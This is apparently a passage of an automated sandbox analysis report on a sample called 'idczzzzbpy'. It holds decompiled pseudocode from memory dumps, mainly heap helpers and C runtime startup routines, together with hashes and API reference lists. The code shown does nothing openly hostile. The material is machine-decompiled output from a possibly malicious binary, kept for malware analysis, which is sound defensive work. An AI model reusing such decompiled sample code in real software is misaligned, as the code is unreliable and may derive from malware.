                    • Instruction ID: b92b655d56b4a52082126c3ba4816ca9f900695b1777e1322c2614339ba31d9c
                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                    • Instruction Fuzzy Hash: F0D0E935352980CFD617DB5DC954B1577A4FB44B44FC54594E941CB762E72CD944CA00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E016935A1(void* __eax, void* __ebx, void* __ecx) {
                    				void* _t6;
                    				void* _t10;
                    				void* _t11;
                    
                    				_t10 = __ecx;
                    				_t6 = __eax;
                    				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                    					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                    				}
                    				if( *((char*)(_t11 - 0x1a)) != 0) {
                    					return E0167EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    				}
                    				return _t6;
                    			}







                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                    • Instruction ID: 32c99856af0ff296a914d596201a01ae0789f51aedc0137b4bc67704943b39cc
                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                    • Instruction Fuzzy Hash: EFD0A9314011819BEF02AB34CE187683BBABB08208F5820AA80024EB62C33A4A0EC604
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0166DB40() {
                    				signed int* _t3;
                    				void* _t5;
                    
                    				_t3 = L01684620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                    				if(_t3 == 0) {
                    					return 0;
                    				} else {
                    					 *_t3 =  *_t3 | 0x00000400;
                    					return _t3;
                    				}
                    			}






                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                    • Instruction ID: 357216171d3eceb067be81d618fbd8f26f26fb39b0d46ac53aa302ceefcf128f
                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                    • Instruction Fuzzy Hash: 10C08C70380A12AAEB222F20CD01B003AA5BB50B05F4400A06300DA0F0EF78D801E600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E016EA537(intOrPtr _a4, intOrPtr _a8) {
                    
                    				return L01688E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                    			}



                    0x016ea553

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                    • Instruction ID: f45994dd3235d14dc6cd24a6c14337d23ce0eea65efe0808be59719537628cbd
                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                    • Instruction Fuzzy Hash: 9AC01236080248BBCB126F81CC00F067B2AFBA4B60F008014BA080B5A08632E970EA88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E01683A1C(intOrPtr _a4) {
                    				void* _t5;
                    
                    				return L01684620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                    			}




                    0x01683a35

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                    • Instruction ID: c12ef7a529cbcd483df21ad6427eb0b6ae0acbf6443c1c1ee267d7bde3c1cbcd
                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                    • Instruction Fuzzy Hash: 80C08C32080248BBC7126E41DC00F017B2AE7A4B60F000020B6040A5608A32ECA0D58C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0166AD30(intOrPtr _a4) {
                    
                    				return L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                    			}



                    0x0166ad49

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                    • Instruction ID: 7e34e645b190efc93c87af7f255c19b673554c5a4bca59a5e6fb1adc3b0f882b
                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                    • Instruction Fuzzy Hash: 3FC08C32080248BBC7127A45CD00F117B2AE7A0B60F100020F6040A6618972E860D588
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E016776E2(void* __ecx) {
                    				void* _t5;
                    
                    				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                    					return L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                    				}
                    				return _t5;
                    			}





                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                    • Instruction ID: e9465bb8ccb6e63a9f24deb224348a7b16980886d957dd7d6f13f0fb714f9983
                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                    • Instruction Fuzzy Hash: 84C08C701411805AEB2A670CCE28B303A50AB08608F58029CAB01096A2C3A8A823CA08
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E016936CC(void* __ecx) {
                    
                    				if(__ecx > 0x7fffffff) {
                    					return 0;
                    				} else {
                    					return L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                    				}
                    			}




                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                    • Instruction ID: c8a8cc400ee30017a7b9d5725549bbfc1e06309b4cb3f10f94b123ecc268f575
                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                    • Instruction Fuzzy Hash: 87C02B70150450FBDB252F30CD00F247258F700A21F6403587220456F0EF289C00D104
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E01687D50() {
                    				intOrPtr* _t3;
                    
                    				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                    				if(_t3 != 0) {
                    					return  *_t3;
                    				} else {
                    					return _t3;
                    				}
                    			}





                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                    • Instruction ID: 1a770cb13ae36b14a3a7e46c2e57c0153ad919513caa15887fae89482b9b2e81
                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                    • Instruction Fuzzy Hash: 44B092363019408FCE16EF18C480B1533E4FB44A40B9400D0E400CBA21D329E8008900
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E01692ACB() {
                    				void* _t5;
                    
                    				return E0167EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    			}




                    0x01692adc

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                    • Instruction ID: 7c3137c52729dadda63cd1335ed6a257885c76f3c77583725813febb1ad83ff0
                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                    • Instruction Fuzzy Hash: 2EB01232C10441CFCF02EF40CF10B297732FB00B50F0544D5900127930C329AC01CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8f126ed55de881162eff4012366aafa7b27cb1f6f35cb1ebb80a55d93971f895
                    • Instruction ID: ede3fe28e192ced9ac2b320b64307ea5110413a5071d9a74eb03918aa1d5978b
                    • Opcode Fuzzy Hash: 8f126ed55de881162eff4012366aafa7b27cb1f6f35cb1ebb80a55d93971f895
                    • Instruction Fuzzy Hash: A39002A121140403D18069994C456470009E7D0346F51C021A2054955ECB699C917275
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6b511465533ae21ee06c6a0aef92c89c472643c01d252065e1adaf04355008cc
                    • Instruction ID: 6f98039c10d1bd5cc000c3387839a1a3a9ebb92aebe93f0fa06c0f64e7f7c8e5
                    • Opcode Fuzzy Hash: 6b511465533ae21ee06c6a0aef92c89c472643c01d252065e1adaf04355008cc
                    • Instruction Fuzzy Hash: 7B9002A122100043D144659948457470049E7E1245F51C022A2144954CC6699CA16265
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: deb4f5f5ba24b9558346dd70c636731b641d97cb959359f38a7227a5b2e9df86
                    • Instruction ID: 3b7052feeadd6c831cf81207b6c207cff17519dd0b28d5dd2fdd398cfa99f3c5
                    • Opcode Fuzzy Hash: deb4f5f5ba24b9558346dd70c636731b641d97cb959359f38a7227a5b2e9df86
                    • Instruction Fuzzy Hash: 249002A1611140434580B5994C454475019F7E1345391C131A0444960CC7A89895A3A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4ee9d1515b0531a7a448368eed2ce60f1ce4ba84e74b6523ab15d4ef541dcb38
                    • Instruction ID: cfdbc295c759539ae1d2672ce52b35a1c46354073574d6becdfbf2d6e168d3fb
                    • Opcode Fuzzy Hash: 4ee9d1515b0531a7a448368eed2ce60f1ce4ba84e74b6523ab15d4ef541dcb38
                    • Instruction Fuzzy Hash: E790027125100403D18175994845647000DF7D0285F91C022A0414954EC7959A96BBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67af73f35dffcabc79a75d9a568acf080d3f27994a9e98714a631463eccc5c91
                    • Instruction ID: e0a0f40578d3357ec263ea5dcb607070463e9a73c87fbafee045343f3145a331
                    • Opcode Fuzzy Hash: 67af73f35dffcabc79a75d9a568acf080d3f27994a9e98714a631463eccc5c91
                    • Instruction Fuzzy Hash: F490026131100403D14265994855647000DE7D1389F91C022E1414955DC7659993B272
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6eeead3f7a82c5c1aac60aaf564e045e85eda7da1e1610c2345fb54de4ac0c5
                    • Instruction ID: b35be203d62e5f30cb7fedebf0e8f5bdd0870686752a13c618020f7c9a5ab54d
                    • Opcode Fuzzy Hash: e6eeead3f7a82c5c1aac60aaf564e045e85eda7da1e1610c2345fb54de4ac0c5
                    • Instruction Fuzzy Hash: 6A90026125100803D18075998855747000AE7D0645F51C021A0014954DC75699A577F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 595d500d9a6eff6f70b2be89fd9b53bdfcf28e0ee7bc5326b147665eec74eaeb
                    • Instruction ID: 3b690c10017b45e4420bc54812d5618e2f1d629410b7fa9d159da0fe10d0f647
                    • Opcode Fuzzy Hash: 595d500d9a6eff6f70b2be89fd9b53bdfcf28e0ee7bc5326b147665eec74eaeb
                    • Instruction Fuzzy Hash: 6890027121144003D1807599888564B5009F7E0345F51C421E0415954CC7559896A361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0085488662818673795f17af85bbfd13c54263c6d6eb3b2a15ae69075341ce6d
                    • Instruction ID: 5902a1a1ba8b750250dd129527ac6625609908ba19650a1610c8e3c2382db683
                    • Opcode Fuzzy Hash: 0085488662818673795f17af85bbfd13c54263c6d6eb3b2a15ae69075341ce6d
                    • Instruction Fuzzy Hash: 3F90027121140403D14065994C497870009E7D0346F51C021A5154955EC7A5D8D17671
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80c3b95560e33816a9e188471c052c2f813c1d61378b29fce64132779fb606e0
                    • Instruction ID: 524ff479d5b79dc69f5baac5b1f148731b10fe3f1e2db64bd943bbfe55ab8366
                    • Opcode Fuzzy Hash: 80c3b95560e33816a9e188471c052c2f813c1d61378b29fce64132779fb606e0
                    • Instruction Fuzzy Hash: 6590026121144443D18066994C45B4F4109E7E1246F91C029A4146954CCA5598956761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    C-Code - Quality: 85%
                    			E003B38A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				signed int* _t82;
                    				signed int _t86;
                    				long _t90;
                    				void* _t91;
                    				intOrPtr _t94;
                    				signed int _t98;
                    				signed int _t99;
                    				signed char _t103;
                    				void** _t105;
                    				void** _t106;
                    				void** _t109;
                    				signed char _t111;
                    				long _t119;
                    				void* _t129;
                    				signed int* _t133;
                    				void* _t135;
                    				signed int* _t138;
                    				void** _t139;
                    				void* _t141;
                    				signed int _t142;
                    				signed int _t143;
                    				void** _t147;
                    				signed int _t149;
                    				void* _t150;
                    				void** _t154;
                    				void* _t155;
                    				void* _t156;
                    
                    				_push(0x64);
                    				_push(0x3c2260);
                    				E003B2400(__ebx, __edi, __esi);
                    				E003B442F(0xb);
                    				 *(_t155 - 4) = 0;
                    				_push(0x40);
                    				_t141 = 0x20;
                    				_push(_t141);
                    				_t82 = E003B4869();
                    				_t133 = _t82;
                    				 *(_t155 - 0x24) = _t133;
                    				if(_t133 != 0) {
                    					 *0x3c4848 = _t82;
                    					 *0x3c50e4 = _t141;
                    					while(_t133 <  &(_t82[0x200])) {
                    						_t133[1] = 0xa00;
                    						 *_t133 =  *_t133 | 0xffffffff;
                    						_t133[2] = 0;
                    						_t133[9] = _t133[9] & 0x00000080;
                    						_t133[9] = _t133[9] & 0x0000007f;
                    						_t133[9] = 0xa0a;
                    						_t133[0xe] = 0;
                    						_t133[0xd] = 0;
                    						_t133 =  &(_t133[0x10]);
                    						 *(_t155 - 0x24) = _t133;
                    						_t82 =  *0x3c4848; // 0x0
                    					}
                    					GetStartupInfoW(_t155 - 0x74);
                    					if( *((short*)(_t155 - 0x42)) == 0) {
                    						L27:
                    						_t129 = 0xfffffffe;
                    						L28:
                    						_t142 = 0;
                    						while(1) {
                    							 *(_t155 - 0x2c) = _t142;
                    							if(_t142 >= 3) {
                    								break;
                    							}
                    							_t147 =  *0x3c4848 + (_t142 << 6);
                    							 *(_t155 - 0x24) = _t147;
                    							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
                    								_t147[1] = 0x81;
                    								if(_t142 != 0) {
                    									_t65 = _t142 - 1; // -1
                    									asm("sbb eax, eax");
                    									_t90 =  ~_t65 + 0xfffffff5;
                    								} else {
                    									_t90 = 0xfffffff6;
                    								}
                    								_t91 = GetStdHandle(_t90);
                    								 *(_t155 - 0x1c) = _t91;
                    								if(_t91 == 0xffffffff || _t91 == 0) {
                    									L45:
                    									_t147[1] = _t147[1] | 0x00000040;
                    									 *_t147 = _t129;
                    									_t94 =  *0x3c6100;
                    									if(_t94 != 0) {
                    										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
                    									}
                    									goto L47;
                    								} else {
                    									_t98 = GetFileType(_t91);
                    									if(_t98 == 0) {
                    										goto L45;
                    									}
                    									 *_t147 =  *(_t155 - 0x1c);
                    									_t99 = _t98 & 0x000000ff;
                    									if(_t99 != 2) {
                    										if(_t99 != 3) {
                    											L44:
                    											_t71 =  &(_t147[3]); // -3950652
                    											E003B40A2(_t71, 0xfa0, 0);
                    											_t156 = _t156 + 0xc;
                    											_t147[2] = _t147[2] + 1;
                    											goto L47;
                    										}
                    										_t103 = _t147[1] | 0x00000008;
                    										L43:
                    										_t147[1] = _t103;
                    										goto L44;
                    									}
                    									_t103 = _t147[1] | 0x00000040;
                    									goto L43;
                    								}
                    							} else {
                    								_t147[1] = _t147[1] | 0x00000080;
                    								L47:
                    								_t142 = _t142 + 1;
                    								continue;
                    							}
                    						}
                    						 *(_t155 - 4) = _t129;
                    						E003B3B53();
                    						_t86 = 0;
                    						L49:
                    						return E003B2445(_t86);
                    					}
                    					_t105 =  *(_t155 - 0x40);
                    					if(_t105 == 0) {
                    						goto L27;
                    					}
                    					_t135 =  *_t105;
                    					 *(_t155 - 0x1c) = _t135;
                    					_t106 =  &(_t105[1]);
                    					 *(_t155 - 0x28) = _t106;
                    					 *(_t155 - 0x20) = _t106 + _t135;
                    					if(_t135 >= 0x800) {
                    						_t135 = 0x800;
                    						 *(_t155 - 0x1c) = 0x800;
                    					}
                    					_t149 = 1;
                    					 *(_t155 - 0x30) = 1;
                    					while( *0x3c50e4 < _t135) {
                    						_t138 = E003B4869(_t141, 0x40);
                    						 *(_t155 - 0x24) = _t138;
                    						if(_t138 != 0) {
                    							0x3c4848[_t149] = _t138;
                    							 *0x3c50e4 =  *0x3c50e4 + _t141;
                    							while(_t138 <  &(0x3c4848[_t149][0x200])) {
                    								_t138[1] = 0xa00;
                    								 *_t138 =  *_t138 | 0xffffffff;
                    								_t138[2] = 0;
                    								_t138[9] = _t138[9] & 0x00000080;
                    								_t138[9] = 0xa0a;
                    								_t138[0xe] = 0;
                    								_t138[0xd] = 0;
                    								_t138 =  &(_t138[0x10]);
                    								 *(_t155 - 0x24) = _t138;
                    							}
                    							_t149 = _t149 + 1;
                    							 *(_t155 - 0x30) = _t149;
                    							_t135 =  *(_t155 - 0x1c);
                    							continue;
                    						}
                    						_t135 =  *0x3c50e4;
                    						 *(_t155 - 0x1c) = _t135;
                    						break;
                    					}
                    					_t143 = 0;
                    					 *(_t155 - 0x2c) = 0;
                    					_t129 = 0xfffffffe;
                    					_t109 =  *(_t155 - 0x28);
                    					_t139 =  *(_t155 - 0x20);
                    					while(_t143 < _t135) {
                    						_t150 =  *_t139;
                    						if(_t150 == 0xffffffff || _t150 == _t129) {
                    							L22:
                    							_t143 = _t143 + 1;
                    							 *(_t155 - 0x2c) = _t143;
                    							_t109 =  &(( *(_t155 - 0x28))[0]);
                    							 *(_t155 - 0x28) = _t109;
                    							_t139 =  &(_t139[1]);
                    							 *(_t155 - 0x20) = _t139;
                    							continue;
                    						} else {
                    							_t111 =  *_t109;
                    							if((_t111 & 0x00000001) == 0) {
                    								goto L22;
                    							}
                    							if((_t111 & 0x00000008) != 0) {
                    								L20:
                    								_t154 = 0x3c4848[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                    								 *(_t155 - 0x24) = _t154;
                    								 *_t154 =  *_t139;
                    								_t154[1] =  *( *(_t155 - 0x28));
                    								_t37 =  &(_t154[3]); // 0xd
                    								E003B40A2(_t37, 0xfa0, 0);
                    								_t156 = _t156 + 0xc;
                    								_t154[2] = _t154[2] + 1;
                    								_t139 =  *(_t155 - 0x20);
                    								L21:
                    								_t135 =  *(_t155 - 0x1c);
                    								goto L22;
                    							}
                    							_t119 = GetFileType(_t150);
                    							_t139 =  *(_t155 - 0x20);
                    							if(_t119 == 0) {
                    								goto L21;
                    							}
                    							goto L20;
                    						}
                    					}
                    					goto L28;
                    				}
                    				_t86 = E003B2600(_t155, 0x3c3400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                    				goto L49;
                    			}






























                    APIs
                    • __lock.LIBCMT ref: 003B38B6
                      • Part of subcall function 003B442F: __mtinitlocknum.LIBCMT ref: 003B4441
                      • Part of subcall function 003B442F: EnterCriticalSection.KERNEL32(00000000,?,003B37AB,0000000D), ref: 003B445A
                    • __calloc_crt.LIBCMT ref: 003B38C7
                      • Part of subcall function 003B4869: __calloc_impl.LIBCMT ref: 003B4878
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 003B38E2
                    • GetStartupInfoW.KERNEL32(?,003C2260,00000064,003B1654,003C2190,00000014), ref: 003B393B
                    • __calloc_crt.LIBCMT ref: 003B3986
                    • GetFileType.KERNEL32(00000001), ref: 003B39CF
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 2772871689-0
                    • Opcode ID: f650a6e1e4164bdb1b97cae910cdb6e6b535979b9fa428d921f05ac310dc86b4
                    • Instruction ID: 3f432dc743191298f6bc49eb10788041ca3d1bf5f50f8f544279b781cd6c1c76
                    • Opcode Fuzzy Hash: f650a6e1e4164bdb1b97cae910cdb6e6b535979b9fa428d921f05ac310dc86b4
                    • Instruction Fuzzy Hash: 49810671D043658FCB12CF68C8406E9BBF4AF05328F24426DD6A6EBBD1D7349A02CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E003B3815(void* __ebx, void* __edi, void* __eflags) {
                    				void* __esi;
                    				void* _t3;
                    				intOrPtr _t6;
                    				long _t14;
                    				long* _t27;
                    
                    				E003B1890(_t3);
                    				if(E003B4560() != 0) {
                    					_t6 = E003B4001(E003B35A6);
                    					 *0x3c350c = _t6;
                    					__eflags = _t6 - 0xffffffff;
                    					if(_t6 == 0xffffffff) {
                    						goto L1;
                    					} else {
                    						_t27 = E003B4869(1, 0x3bc);
                    						__eflags = _t27;
                    						if(_t27 == 0) {
                    							L6:
                    							E003B388B();
                    							__eflags = 0;
                    							return 0;
                    						} else {
                    							__eflags = E003B405D( *0x3c350c, _t27);
                    							if(__eflags == 0) {
                    								goto L6;
                    							} else {
                    								_push(0);
                    								_push(_t27);
                    								E003B3762(__ebx, __edi, _t27, __eflags);
                    								_t14 = GetCurrentThreadId();
                    								_t27[1] = _t27[1] | 0xffffffff;
                    								 *_t27 = _t14;
                    								__eflags = 1;
                    								return 1;
                    							}
                    						}
                    					}
                    				} else {
                    					L1:
                    					E003B388B();
                    					return 0;
                    				}
                    			}









                    APIs
                    • __init_pointers.LIBCMT ref: 003B3815
                      • Part of subcall function 003B1890: EncodePointer.KERNEL32(00000000,?,003B381A,003B163A,003C2190,00000014), ref: 003B1893
                      • Part of subcall function 003B1890: __initp_misc_winsig.LIBCMT ref: 003B18AE
                      • Part of subcall function 003B1890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003B4117
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003B412B
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003B413E
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003B4151
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003B4164
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003B4177
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003B418A
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003B419D
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003B41B0
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003B41C3
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003B41D6
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003B41E9
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003B41FC
